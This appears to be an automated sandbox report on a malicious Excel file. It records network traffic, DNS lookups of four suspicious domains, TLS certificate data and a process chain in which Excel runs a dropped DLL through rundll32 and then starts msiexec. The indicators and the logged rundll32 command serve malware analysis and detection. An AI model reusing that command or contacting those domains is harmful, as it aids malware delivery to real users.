,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 26, 2021 21:25:19.822429895 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:19.843436956 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:19.843513012 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:19.852008104 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:19.875051022 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:19.879328966 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:19.879359007 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:19.879411936 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:19.879441977 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:19.888462067 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:19.911640882 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:19.912218094 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:19.912314892 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.124550104 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.145728111 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438649893 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438698053 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438736916 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438764095 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438801050 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438838959 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438867092 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.438868999 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.438899040 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.438935041 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.438971996 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.439160109 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.439201117 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.439237118 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.439249039 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.439281940 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.439907074 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.439951897 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.439987898 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.439987898 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.440025091 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.440063953 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.440694094 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.440764904 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.466262102 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.466551065 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.466659069 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.466685057 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.466782093 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.494735003 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.494909048 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.498755932 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498781919 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498801947 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498816967 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498836040 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498855114 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498876095 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.498879910 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498919964 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.498928070 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498955011 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.498955011 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.498977900 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.498980045 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499005079 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499017000 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499028921 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499067068 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499442101 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499464035 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499484062 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499505997 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499509096 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499528885 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499536037 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499562025 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499563932 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499589920 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499592066 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499614954 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499614954 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499644041 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499663115 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499666929 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499684095 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.499694109 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.499732018 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.500997066 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.522934914 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.522959948 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.523053885 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.523076057 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.523103952 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.523144960 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.523171902 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.549694061 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.549787045 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.549789906 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.549807072 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.549864054 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.549873114 CET49165443192.168.2.22172.67.150.228
                              Jan 26, 2021 21:25:20.549877882 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.549916029 CET44349165172.67.150.228192.168.2.22
                              Jan 26, 2021 21:25:20.549928904 CET49165443192.168.2.22172.67.150.228

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 26, 2021 21:25:19.788542032 CET5219753192.168.2.228.8.8.8
                              Jan 26, 2021 21:25:19.810256004 CET53521978.8.8.8192.168.2.22
                              Jan 26, 2021 21:25:52.421648026 CET5309953192.168.2.228.8.8.8
                              Jan 26, 2021 21:25:52.438337088 CET53530998.8.8.8192.168.2.22
                              Jan 26, 2021 21:25:54.128047943 CET5283853192.168.2.228.8.8.8
                              Jan 26, 2021 21:25:54.147412062 CET53528388.8.8.8192.168.2.22
                              Jan 26, 2021 21:25:54.766288996 CET6120053192.168.2.228.8.8.8
                              Jan 26, 2021 21:25:54.850646019 CET53612008.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Jan 26, 2021 21:25:19.788542032 CET192.168.2.228.8.8.80x2c09Standard query (0)rnollg.comA (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:52.421648026 CET192.168.2.228.8.8.80x9b74Standard query (0)gadgetswolf.comA (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:54.128047943 CET192.168.2.228.8.8.80xcc21Standard query (0)homesoapmolds.comA (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:54.766288996 CET192.168.2.228.8.8.80x8798Standard query (0)govemedico.tkA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Jan 26, 2021 21:25:19.810256004 CET8.8.8.8192.168.2.220x2c09No error (0)rnollg.com172.67.150.228A (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:19.810256004 CET8.8.8.8192.168.2.220x2c09No error (0)rnollg.com104.21.11.254A (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:52.438337088 CET8.8.8.8192.168.2.220x9b74No error (0)gadgetswolf.com104.21.44.135A (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:52.438337088 CET8.8.8.8192.168.2.220x9b74No error (0)gadgetswolf.com172.67.200.147A (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:54.147412062 CET8.8.8.8192.168.2.220xcc21No error (0)homesoapmolds.com172.67.198.109A (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:54.147412062 CET8.8.8.8192.168.2.220xcc21No error (0)homesoapmolds.com104.21.60.169A (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:54.850646019 CET8.8.8.8192.168.2.220x8798No error (0)govemedico.tk172.67.158.184A (IP address)IN (0x0001)
                              Jan 26, 2021 21:25:54.850646019 CET8.8.8.8192.168.2.220x8798No error (0)govemedico.tk104.21.73.69A (IP address)IN (0x0001)

                              HTTPS Packets

                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                              Jan 26, 2021 21:25:19.879359007 CET172.67.150.228443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                              Jan 26, 2021 21:25:52.554636002 CET104.21.44.135443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                              Jan 26, 2021 21:25:54.204780102 CET172.67.198.109443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                              Jan 26, 2021 21:25:54.905309916 CET172.67.158.184443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:21:24:39
                              Start date:26/01/2021
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                              Imagebase:0x13f0e0000
                              File size:27641504 bytes
                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:21:24:44
                              Start date:26/01/2021
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                              Imagebase:0xff2b0000
                              File size:45568 bytes
                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:21:24:44
                              Start date:26/01/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                              Imagebase:0xd10000
                              File size:44544 bytes
                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:21:25:12
                              Start date:26/01/2021
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):true
                              Commandline:msiexec.exe
                              Imagebase:0x4e0000
                              File size:73216 bytes
                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Disassembly

                              Code Analysis

                              Reset < >